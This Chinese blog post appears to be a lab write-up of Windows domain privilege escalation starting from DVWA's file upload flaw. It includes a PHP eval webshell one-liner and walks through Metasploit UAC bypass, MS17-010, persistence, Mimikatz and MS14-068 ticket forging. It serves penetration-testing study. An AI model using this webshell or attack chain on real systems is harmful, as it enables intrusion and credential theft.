DVWA windows提权

本文介绍了通过DVWA的文件上传漏洞进行Windows提权的过程,包括利用Meterpreter、Mimikatz和MS14-068漏洞进行权限提升,以及在不同安全等级下采用的不同提权策略,如命令执行、SQL注入等。最后提到了UDF提权方法和XSS获取cookie的方法。
摘要由CSDN通过智能技术生成

环境:

域控:winser 08

域靶机:win xp,win 7 (dvwa装在win7)

攻击机:win10,kali2020

不知道从哪里提权开始那就从文件上传吧。

突然来了兴趣,对靶机进行nessus扫描了一下,搭的环境漏洞多的不行,找个时间复现下里面的漏洞。

文件上传漏洞提权:

思路:如果存在文件上传漏洞,那么通过上传一句话木马,用菜刀连接,传入后门,结合msf进行持久化渗透。

孰能生巧,那就从简单的开始。

等级:low

写入一句话<?php @eval($_REQUEST[‘xy’]) ?> 上传

文件上传成功,上菜刀连接。

这里应该就有好几种方式了。

连接成功,查看是否存在域控,菜刀虚拟终端 ipconfig /all,可以看到在test.com这个域中,先对这台靶机进行提权,msf生成payload,菜刀上传。

 

 

上传木马后,终端执行木马,start backdoor.exe

msf回显,开始提权。

Getsystem尝试提权失败,回到msf,用bypassuac中的任意一个尝试提权。

我这里选bypassuac_eventvwr,设置参数

首次尝试提权失败,想了想,没有进程迁移,返回到meterpreter 进程迁移选 explorer.exe,稳定输出,进程迁移有个好出就是可以持久化的保持连接就算木马被关闭。

再次尝试提权,还是失败,看了下报错 木马生成错误,选错架构了,重新再来一遍。

经过多方尝试还是报错,那可能就是环境的问题了,那么这里我们用模块检测一下,靶机是否存在ms17-010 永恒之蓝漏洞,由于没有进行端口检测,不知道是否开启了445,139端口,那这里就盲猜的检测一下吧,假装欧皇,可以看到漏洞存在。

连接成功现在进行会话提升,会话提升有三种方式

  1. Session -u id
  2. 设置payload
  3. Python -c “import pty;pty.spawn(‘/bin/bash’)”

好的连接成功了,这下权限提升都省了。

进程迁移,后渗透攻击,持久化的后门搞起来。

Msf有run persistence

现在可以进行对域控的提权了

Mimikatz和ms14-068:

信息收集:

进入shell进行域控提权。

首先上传mimikatz和ms14-068到靶机。生成票据,并注入。Ms14-068 msf有检测模块这里就省略检测这个环节了。

生成票据,首先得清空票据,kali 语句没问题报错了,windows没有,那就问题稍后再看吧。

注入票据,注入成功,尝试连接域控。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值